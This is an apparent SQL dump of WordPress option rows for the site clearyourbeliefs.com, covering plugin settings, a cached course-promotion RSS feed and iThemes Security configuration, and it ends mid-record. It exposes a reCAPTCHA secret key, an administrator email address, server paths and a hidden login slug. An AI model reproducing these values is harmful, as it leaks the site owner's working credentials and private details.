(11593, 'jr_mt_settings', 'a:11:{s:9:"all_pages";s:0:"";s:9:"all_posts";s:0:"";s:9:"site_home";s:0:"";s:7:"current";s:0:"";s:3:"url";a:1:{i:0;a:3:{s:3:"url";s:34:"http://clearyourbeliefs.com/newcyb";s:4:"prep";a:3:{s:4:"host";s:20:"clearyourbeliefs.com";s:4:"path";s:6:"newcyb";s:5:"query";a:0:{}}s:5:"theme";s:12:"twentytwelve";}}s:10:"url_prefix";a:0:{}s:12:"url_asterisk";a:0:{}s:13:"query_present";b:0;s:5:"query";a:0:{}s:8:"remember";a:1:{s:5:"query";a:0:{}}s:8:"override";a:1:{s:5:"query";a:0:{}}}', 'yes'),
(11594, 'jr_mt_internal_settings', 'a:2:{s:7:"version";s:5:"5.0.3";s:9:"permalink";s:11:"/%postname%";}', 'yes'),
(13893, '_wr_pb_shortcodes', 's:1:"1";', 'yes'),
(108872, '_site_transient_timeout_browser_53ea26d59f5623b7f508c7d001b12c8d', '1525745559', 'no'),
(108873, '_site_transient_browser_53ea26d59f5623b7f508c7d001b12c8d', 'a:10:{s:4:"name";s:6:"Safari";s:7:"version";s:4:"11.1";s:8:"platform";s:9:"Macintosh";s:10:"update_url";s:29:"https://www.apple.com/safari/";s:7:"img_src";s:43:"http://s.w.org/images/browsers/safari.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/safari.png?1";s:15:"current_version";s:2:"11";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(13888, '_transient_wr_pb_version', '2.4.2', 'yes'),
(13889, '_wr_pb_providers', 's:1:"1";', 'yes'),
(13890, '_wr_pb_autoload_register', 's:1:"1";', 'yes'),
(13891, '_wr_pb_sc_by_providers', 's:1:"1";', 'yes'),
(13892, '_wr_pb_sc_by_providers_name', 's:1:"1";', 'yes'),
(13894, '_wr_pb_reload_shortcodes', '0', 'yes'),
(13902, 'siteorigin_panels_settings', 'a:9:{s:12:"copy-content";b:1;s:10:"animations";b:1;s:15:"bundled-widgets";b:1;s:10:"responsive";b:1;s:12:"mobile-width";i:780;s:13:"margin-bottom";i:0;s:12:"margin-sides";i:30;s:10:"inline-css";b:0;s:10:"post-types";a:2:{i:0;s:4:"page";i:1;s:4:"post";}}', 'yes'),
(21706, 'widget_nav_menu', 'a:3:{i:2;a:2:{s:5:"title";s:15:"More to Explore";s:8:"nav_menu";i:3;}i:3;a:2:{s:5:"title";s:9:"BLOG HOME";s:8:"nav_menu";i:7;}s:12:"_multiwidget";i:1;}', 'yes'),
(21707, 'widget_toetwitterwidget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(31924, 'WPLANG', '', 'yes'),
(31831, 'theme_mods_twentyfourteen', 'a:1:{s:16:"sidebars_widgets";a:2:{s:4:"time";i:1436851590;s:4:"data";a:4:{s:19:"wp_inactive_widgets";a:3:{i:0;s:14:"recent-posts-2";i:1;s:10:"nav_menu-2";i:2;s:10:"nav_menu-3";}s:9:"sidebar-1";a:0:{}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}}}}', 'yes'),
(87893, '_transient_timeout_plugin_slugs', '1524104745', 'no'),
(87894, '_transient_plugin_slugs', 'a:28:{i:0;s:41:"all-in-one-favicon/all-in-one-favicon.php";i:1;s:47:"better-search-replace/better-search-replace.php";i:2;s:59:"black-studio-tinymce-widget/black-studio-tinymce-widget.php";i:3;s:37:"disable-comments/disable-comments.php";i:4;s:33:"duplicate-post/duplicate-post.php";i:5;s:25:"form-maker/form-maker.php";i:6;s:47:"infusionsoft-for-developers/infusionsoft-wp.php";i:7;s:45:"ithemes-security-pro/ithemes-security-pro.php";i:8;s:53:"jonradio-multiple-themes/jonradio-multiple-themes.php";i:9;s:39:"siteorigin-panels/siteorigin-panels.php";i:10;s:41:"password-protected/password-protected.php";i:11;s:39:"pixelyoursite-pro/pixelyoursite-pro.php";i:12;s:29:"ready-ecommerce/ecommerce.php";i:13;s:38:"commercial/ready-ecommerce-licence.php";i:14;s:34:"Ready-USAepay/usaepay-payments.php";i:15;s:59:"rt-custom-css-page-and-post/rt-custom-css-page-and-post.php";i:16;s:45:"search-and-replace/inpsyde-search-replace.php";i:17;s:43:"shortcodes-ultimate/shortcodes-ultimate.php";i:18;s:39:"simple-custom-css/simple-custom-css.php";i:19;s:31:"custom-css-js/custom-css-js.php";i:20;s:39:"smart-passworded-pages/smartpwpages.php";i:21;s:63:"unlimited-addons-for-wpbakery-page-builder/unlimited_addons.php";i:22;s:25:"user-photo/user-photo.php";i:23;s:43:"visual-form-builder/visual-form-builder.php";i:24;s:27:"js_composer/js_composer.php";i:25;s:34:"wp-clone-by-wp-academy/wpclone.php";i:26;s:22:"wp-editor/wpeditor.php";i:27;s:75:"wp-time-slots-availability-calendar/wp-time-slots-availability-calendar.php";}', 'no'),
(85986, 'wpb_js_composer_license_activation_notified', 'yes', 'yes'),
(85985, 'vc_version', '5.4.5', 'yes'),
(99613, '_transient_timeout_feed_a41fbee65e190c85018f9081fcc3dfc4', '1517202476', 'no'),
(99614, '_transient_feed_a41fbee65e190c85018f9081fcc3dfc4', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n\n\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:22:"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:3:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:19:"News – WP Academy";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:28:"http://members.wpacademy.com";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:18:"WordPress Training";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:13:"lastBuildDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 26 Dec 2017 13:14:35 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:5:"en-US";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:1:{i:0;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:3:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:57:"Learn the Getting Things Done (GTD®) Productivity System";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:91:"http://members.wpacademy.com/2016/05/learn-the-getting-things-done-gtd-productivity-system/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 06 May 2016 10:56:27 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:4:"News";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:37:"http://members.wpacademy.com/?p=20246";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:617:"<p>I am thrilled to present my latest course, Get It Done with IQTell: Best App for GTD® and Inbox Zero, for free &#8212; but only during the launch period.  Sign-up now before this course become paid!  And please leave a positive review if you like it. David Allen&#8217;s Getting Things Done(®) or GTD® system is [&#8230;]</p>\n<p>The post <a rel="nofollow" href="http://members.wpacademy.com/2016/05/learn-the-getting-things-done-gtd-productivity-system/">Learn the Getting Things Done (GTD®) Productivity System</a> appeared first on <a rel="nofollow" href="http://members.wpacademy.com">WP Academy</a>.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"marc beneteau";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3880:"<p>I am thrilled to present my latest course, <strong><a href="https://www.udemy.com/gettingthingsdone/">Get It Done with IQTell: Best App for GTD® and Inbox Zero</a></strong>, for free &#8212; but only during the launch period.  Sign-up now before this course become paid!  And please leave a positive review if you like it.</p>\n<p><a href="https://www.udemy.com/gettingthingsdone/"><img class="aligncenter size-full wp-image-20247" src="http://members.wpacademy.com/wp-content/uploads/2016/05/get-it-done-with-iqtell-video.jpg" alt="get-it-done-with-iqtell-video" width="400" height="253" srcset="http://members.wpacademy.com/wp-content/uploads/2016/05/get-it-done-with-iqtell-video.jpg 400w, http://members.wpacademy.com/wp-content/uploads/2016/05/get-it-done-with-iqtell-video-300x190.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" /></a></p>\n<p>David Allen&#8217;s <strong class="redactor-inline-converted">Getting Things Done(®)</strong> or <strong class="redactor-inline-converted">GTD® </strong>system is a world-famous productivity system. <strong class="redactor-inline-converted"><a href="http://iqtell.com/?eu=o5z7e"> IQTell®</a>  </strong>is one of the leading software implementations of the GTD model. Learn both in under an hour in this fast-paced training sequence, which is guaranteed to give you concepts and tools that will change your life, or money-back!</p>\n<p>Being productive requires a <em class="redactor-inline-converted">mindset, a system, and a tool.</em>  GTD provides the <em class="redactor-inline-converted">mindset </em>and the <em class="redactor-inline-converted">system</em>, and is a powerful model for managing tasks, goals and ideas &#8212; all the things that your life is made of, and upon which your success depends. <a href="http://iqtell.com/?eu=o5z7e">IQTell</a> provides the <em class="redactor-inline-converted">tool</em>.  IQTell is a great implementation of the GTD model and is a very useful management tool for any system.</p>\n<p><strong class="redactor-inline-converted">Here is what you will learn: </strong></p>\n<ul>\n<li>A conceptual and practical understanding of the GTD® system</li>\n<li>We will put the IQTell software in context, comparing it with other applications designed for GTD, CRM (Customer Relationship Management) and Project Management&#8230;</li>\n<li>And then guide you step-by-step through the IQTell software into a complete GTD implementation for your business or personal life&#8230;</li>\n<li>Which will more than likely change the way you organize and run your business and your life, because you will learn both a method and a tool in which all the data you need is in a single place and organized how you want it</li>\n<li>Anybody can benefit from this information: students, entrepreneurs, contractors, clergy, moms</li>\n<li>The only requirement for getting something out of this course is that you have work to do and that you want to better manage, prioritize, or reflect on your current tasks and life goals!</li>\n</ul>\n<p><strong class="redactor-inline-converted">GTD is the world&#8217;s most famous productivity system&#8230;</strong></p>\n<p>But it&#8217;s also famously complex and difficult to understand and implement.  But not any more! With the quick and yet comprehensive GTD summaries provided in this course, and the help of the <a href="http://iqtell.com/?eu=o5z7e">IQTell</a> software, you will be well on your way to what we call &#8220;Productivity Holy Grail&#8221;</p>\n<p><a href="https://www.udemy.com/gettingthingsdone/">Get the course for free during the launch period!</a></p>\n<p>The post <a rel="nofollow" href="http://members.wpacademy.com/2016/05/learn-the-getting-things-done-gtd-productivity-system/">Learn the Getting Things Done (GTD®) Productivity System</a> appeared first on <a rel="nofollow" href="http://members.wpacademy.com">WP Academy</a>.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:4:"href";s:48:"http://members.wpacademy.com/category/news/feed/";s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:44:"http://purl.org/rss/1.0/modules/syndication/";a:2:{s:12:"updatePeriod";a:1:{i:0;a:5:{s:4:"data";s:6:"hourly";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:15:"updateFrequency";a:1:{i:0;a:5:{s:4:"data";s:1:"1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:7:{s:4:"date";s:29:"Sun, 28 Jan 2018 17:07:54 GMT";s:6:"server";s:6:"Apache";s:12:"x-robots-tag";s:15:"noindex, follow";s:4:"link";s:65:"<http://members.wpacademy.com/wp-json/>; rel="https://api.w.org/"";s:13:"last-modified";s:29:"Tue, 26 Dec 2017 13:14:35 GMT";s:4:"etag";s:34:""790790c6abcd31bb8485b5a23fd8b8d5"";s:12:"content-type";s:34:"application/rss+xml; charset=UTF-8";}}s:5:"build";s:14:"20140216132046";}', 'no'),
(108954, '_site_transient_timeout_itsec_upload_dir', '1525433225', 'no'),
(108955, '_site_transient_itsec_upload_dir', 'a:6:{s:4:"path";s:62:"/homepages/40/d300047147/htdocs/cyb/wp-content/uploads/2018/05";s:3:"url";s:54:"http://clearyourbeliefs.com/wp-content/uploads/2018/05";s:6:"subdir";s:8:"/2018/05";s:7:"basedir";s:54:"/homepages/40/d300047147/htdocs/cyb/wp-content/uploads";s:7:"baseurl";s:46:"http://clearyourbeliefs.com/wp-content/uploads";s:5:"error";b:0;}', 'no'),
(88458, 'itsec_data', 'a:5:{s:5:"build";i:4036;s:20:"activation_timestamp";i:1497561866;s:17:"already_supported";b:0;s:15:"setup_completed";b:1;s:18:"tooltips_dismissed";b:1;}', 'yes'),
(88459, 'itsec_global', 'a:24:{s:11:"write_files";b:1;s:18:"notification_email";a:1:{i:0;s:19:"emtiaz121@gmail.com";}s:12:"backup_email";a:1:{i:0;s:19:"emtiaz121@gmail.com";}s:15:"lockout_message";s:5:"error";s:20:"user_lockout_message";s:64:"You have been locked out due to too many invalid login attempts.";s:25:"community_lockout_message";s:77:"Your IP address has been flagged as a threat by the iThemes Security network.";s:9:"blacklist";b:1;s:15:"blacklist_count";i:3;s:16:"blacklist_period";i:7;s:14:"lockout_period";i:15;s:18:"lockout_white_list";a:0:{}s:19:"email_notifications";b:1;s:8:"log_type";i:0;s:12:"log_rotation";i:14;s:12:"log_location";s:76:"/homepages/40/d300047147/htdocs/cyb/wp-content/uploads/ithemes-security/logs";s:14:"allow_tracking";b:1;s:14:"hide_admin_bar";b:1;s:11:"did_upgrade";b:0;s:10:"nginx_file";s:46:"/homepages/40/d300047147/htdocs/cyb/nginx.conf";s:24:"infinitewp_compatibility";b:0;s:8:"log_info";s:27:"clear-your-beliefs-KRv7BP8t";s:9:"lock_file";b:0;s:12:"digest_email";b:0;s:14:"proxy_override";b:0;}', 'yes'),
(88460, 'itsec_initials', 'a:3:{s:5:"login";b:0;s:5:"admin";b:0;s:11:"file_editor";b:0;}', 'yes'),
(88462, 'itsec_privilege', 'a:1:{s:7:"enabled";b:0;}', 'yes'),
(88463, 'itsec_password', 'a:7:{s:8:"generate";b:1;s:13:"generate_role";s:13:"administrator";s:15:"generate_length";i:50;s:11:"expire_role";s:13:"administrator";s:10:"expire_max";i:120;s:6:"expire";b:0;s:12:"expire_force";i:1497562245;}', 'yes'),
(88464, 'itsec_recaptcha', 'a:10:{s:7:"enabled";b:1;s:8:"site_key";s:40:"6LfItyUUAAAAAKT5SbfCwjQwAyWjX4WWO7FSOxYG";s:10:"secret_key";s:40:"6LfItyUUAAAAAE4hiGEomG2L2hhSPKVkpwV_XtaC";s:5:"login";b:1;s:8:"register";b:1;s:8:"comments";b:1;s:8:"language";s:0:"";s:5:"theme";b:1;s:15:"error_threshold";i:7;s:12:"check_period";i:5;}', 'yes'),
(88465, 'itsec_two_factor', 'a:3:{s:4:"roll";s:13:"administrator";s:6:"offset";i:1;s:7:"enabled";b:0;}', 'yes'),
(88466, 'itsec_user_logging', 'a:2:{s:4:"roll";s:13:"administrator";s:7:"enabled";b:0;}', 'yes'),
(88468, 'itsec_ipcheck', 'a:1:{s:7:"api_ban";b:0;}', 'yes'),
(88469, 'itsec_four_oh_four', 'a:5:{s:7:"enabled";b:1;s:12:"check_period";i:5;s:15:"error_threshold";i:20;s:10:"white_list";a:9:{i:0;s:12:"/favicon.ico";i:1;s:11:"/robots.txt";i:2;s:21:"/apple-touch-icon.png";i:3;s:33:"/apple-touch-icon-precomposed.png";i:4;s:17:"/wp-content/cache";i:5;s:18:"/browserconfig.xml";i:6;s:16:"/crossdomain.xml";i:7;s:11:"/labels.rdf";i:8;s:27:"/trafficbasedsspsitemap.xml";}s:5:"types";a:5:{i:0;s:4:".jpg";i:1;s:5:".jpeg";i:2;s:4:".png";i:3;s:4:".gif";i:4;s:4:".css";}}', 'yes'),
(88470, 'itsec_away_mode', 'a:4:{s:4:"type";i:1;s:7:"enabled";b:0;s:5:"start";i:1503360000;s:3:"end";i:1503468000;}', 'yes'),
(88471, 'itsec_ban_users', 'a:4:{s:7:"default";b:1;s:9:"host_list";a:13:{i:0;s:14:"66.191.108.110";i:1;s:14:"167.114.16.163";i:2;s:13:"37.59.178.110";i:3;s:14:"46.105.102.203";i:4;s:15:"104.168.149.196";i:5;s:14:"37.115.188.137";i:6;s:13:"201.18.18.173";i:7;s:14:"178.159.37.114";i:8;s:13:"74.208.41.102";i:9;s:12:"35.227.35.89";i:10;s:14:"23.254.144.141";i:11;s:13:"37.59.178.104";i:12;s:14:"195.22.127.224";}s:10:"agent_list";a:1:{i:0;s:0:"";}s:7:"enabled";b:0;}', 'no'),
(88473, 'itsec_brute_force', 'a:5:{s:7:"enabled";b:1;s:17:"max_attempts_host";i:5;s:17:"max_attempts_user";i:10;s:12:"check_period";i:5;s:14:"auto_ban_admin";b:0;}', 'yes'),
(88474, 'itsec_backup', 'a:9:{s:9:"all_sites";b:1;s:6:"method";i:0;s:8:"location";s:79:"/homepages/40/d300047147/htdocs/cyb/wp-content/uploads/ithemes-security/backups";s:6:"retain";i:0;s:3:"zip";b:1;s:7:"exclude";a:3:{i:0;s:14:"itsec_lockouts";i:1;s:9:"itsec_log";i:2;s:10:"itsec_temp";}s:7:"enabled";b:1;s:8:"interval";i:7;s:8:"last_run";i:1524824542;}', 'no'),
(88475, 'itsec_file_change', 'a:9:{s:7:"enabled";b:1;s:6:"method";b:1;s:9:"file_list";a:1:{i:0;s:0:"";}s:5:"types";a:6:{i:0;s:4:".jpg";i:1;s:5:".jpeg";i:2;s:4:".png";i:3;s:4:".log";i:4;s:3:".mo";i:5;s:3:".po";}s:5:"email";b:1;s:12:"notify_admin";b:1;s:5:"split";b:0;s:10:"last_chunk";b:0;s:8:"last_run";i:1525366987;}', 'no'),
(88476, 'itsec_hide_backend', 'a:7:{s:7:"enabled";b:1;s:4:"slug";s:16:"clearyourbeliefs";s:12:"theme_compat";b:1;s:17:"theme_compat_slug";s:9:"not_found";s:16:"post_logout_slug";s:0:"";s:12:"show-tooltip";b:0;s:8:"register";s:15:"wp-register.php";}', 'yes'),
(88477, 'itsec_ssl', 'a:2:{s:8:"frontend";i:0;s:5:"admin";b:0;}', 'yes'),
(88479, 'itsec_strong_passwords', 'a:2:{s:7:"enabled";b:1;s:4:"roll";s:13:"administrator";}', 'yes'),
(88480, 'itsec_tweaks', 'a:20:{s:13:"protect_files";b:1;s:18:"directory_browsing";b:1;s:15:"request_methods";b:1;s:24:"suspicious_query_strings";b:1;s:17:"write_permissions";b:1;s:11:"uploads_php";b:1;s:18:"wlwmanifest_header";b:1;s:14:"edituri_header";b:1;s:12:"comment_spam";b:1;s:11:"file_editor";b:1;s:14:"disable_xmlrpc";i:0;s:12:"login_errors";b:1;s:21:"force_unique_nicename";b:1;s:27:"disable_unused_author_pages";b:1;s:22:"non_english_characters";b:0;s:16:"long_url_strings";b:0;s:13:"theme_updates";b:0;s:14:"plugin_updates";b:0;s:12:"core_updates";b:0;s:11:"safe_jquery";b:0;}', 'yes'),
(88483, 'ithemes-updater-cache', 'a:9:{s:18:"timeout-multiplier";i:1;s:10:"expiration";i:0;s:9:"timestamp";i:0;s:8:"packages";a:1:{i:0;s:20:"ithemes-security-pro";}s:14:"update_plugins";a:0:{}s:13:"update_themes";a:0:{}s:12:"use_ca_patch";b:0;s:7:"use_ssl";b:1;s:14:"quick_releases";b:0;}', 'yes'),
(33685, 'duplicate_post_copyexcerpt', '1', 'yes'),
(33686, 'duplicate_post_copyattachments', '0', 'yes'),
(33687, 'duplicate_post_copychildren', '0', 'yes'),
(33688, 'duplicate_post_copystatus', '0', 'yes'),
(33689, 'duplicate_post_taxonomies_blacklist', 'a:0:{}', 'yes'),
(33690, 'duplicate_post_show_row', '1', 'yes'),
(33691, 'duplicate_post_show_adminbar', '1', 'yes'),
(33692, 'duplicate_post_show_submitbox', '1', 'yes'),
(33693, 'duplicate_post_version', '2.6', 'yes'),
(99615, '_transient_timeout_feed_mod_a41fbee65e190c85018f9081fcc3dfc4', '1517202476', 'no'),
(99616, '_transient_feed_mod_a41fbee65e190c85018f9081fcc3dfc4', '1517159276', 'no'),
(64810, 'widget_origin_animated-image', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64811, 'widget_origin_button', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64812, 'widget_calendar', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64813, 'widget_origin_call-to-action', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64814, 'widget_siteorigin-panels-embedded-video', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64815, 'widget_form_maker_widget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64816, 'widget_siteorigin-panels-gallery', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64817, 'widget_siteorigin-panels-image', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64818, 'widget_origin_list', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64819, 'widget_pages', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64820, 'widget_siteorigin-panels-post-content', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64821, 'widget_siteorigin-panels-postloop', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64822, 'widget_origin_price-box', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64823, 'widget_toealsopurchasedwidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64824, 'widget_toebestsellerswidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64825, 'widget_toebcwidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64826, 'widget_toebrcwidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64827, 'widget_toecategorybrandsproductswidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64828, 'widget_toecurrencywidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64829, 'widget_toefpwidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64830, 'widget_toemostviewedwidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64831, 'widget_toecommentswidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64832, 'widget_toerecentproductswidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64833, 'widget_toerelatedwidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64834, 'widget_toesearchwidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64835, 'widget_toeshoppingcartwidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64836, 'widget_toespwidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64837, 'widget_toesliderwidget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64838, 'widget_siteorigin-panels-video', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64839, 'widget_shortcodes-ultimate', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64840, 'widget_tag_cloud', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64841, 'widget_origin_testimonial', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64842, 'widget_widget_twentyfourteen_ephemera', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64843, 'widget_black-studio-tinymce', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64844, 'widget_vfb_widget', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(64917, 'wpe_settings', '', 'yes'),
(88563, '_transient_feed_mod_b9388c83948825c1edaef0d856b7b109', '1497601599', 'no'),
(87518, 'custom-css-js-tree', 'a:1:{s:27:"frontend-js-header-internal";a:1:{i:0;s:7:"2720.js";}}', 'yes'),
(79190, 'disable_comments_options', 'a:5:{s:19:"disabled_post_types";a:4:{i:0;s:4:"post";i:1;s:4:"page";i:2;s:10:"attachment";i:3;s:7:"product";}s:17:"remove_everywhere";b:1;s:9:"permanent";b:0;s:16:"extra_post_types";b:0;s:10:"db_version";i:6;}', 'yes'),
(88600, 'fresh_site', '0', 'yes'),
(108880, '_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9', '1525183963', 'no'),
(88572, 'itsec_online_files', 'a:1:{s:7:"enabled";b:0;}', 'yes');
INSERT INTO `cyb_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(88583, 'itsec_local_file_list', 'a:8775:{s:39:"wp-admin/css/colors/blue/colors-rtl.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"644b1f497f37168efa0876e9a41c3a35";}s:43:"wp-admin/css/colors/blue/colors-rtl.min.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"d76e3f993f962326e6a2336db75d3fd6";}s:35:"wp-admin/css/colors/blue/colors.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"cb97bb7d8f7b5813d00c74f495df42e4";}s:39:"wp-admin/css/colors/blue/colors.min.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"835228f437b76cb4336fd2db1841a984";}s:36:"wp-admin/css/colors/blue/colors.scss";a:2:{s:1:"d";i:1402426850;s:1:"h";s:32:"d9d03549d79484672c29145aad594db3";}s:41:"wp-admin/css/colors/coffee/colors-rtl.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"e990ccbcd406eb7639db1966040a4169";}s:45:"wp-admin/css/colors/coffee/colors-rtl.min.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"f867fd7adccd1ecdf764739053a6ec2a";}s:37:"wp-admin/css/colors/coffee/colors.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"31f8a34795536919f4d903f31b2c2abf";}s:41:"wp-admin/css/colors/coffee/colors.min.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"a585d4eb32332d90b23f792312bc4d8a";}s:38:"wp-admin/css/colors/coffee/colors.scss";a:2:{s:1:"d";i:1402426850;s:1:"h";s:32:"397e3820b27a234330c95e05250f61ce";}s:44:"wp-admin/css/colors/ectoplasm/colors-rtl.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"46d310711143ee1c98f788eeed72f49e";}s:48:"wp-admin/css/colors/ectoplasm/colors-rtl.min.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"1e5ae890a49af4d069a4f732d85b1de3";}s:40:"wp-admin/css/colors/ectoplasm/colors.css";a:2:{s:1:"d";i:1497602541;s:1:"h";s:32:"51f80d9f509d4e6b4ea38713046e191b";}s:44:"wp-admin/css/colors/ectoplasm/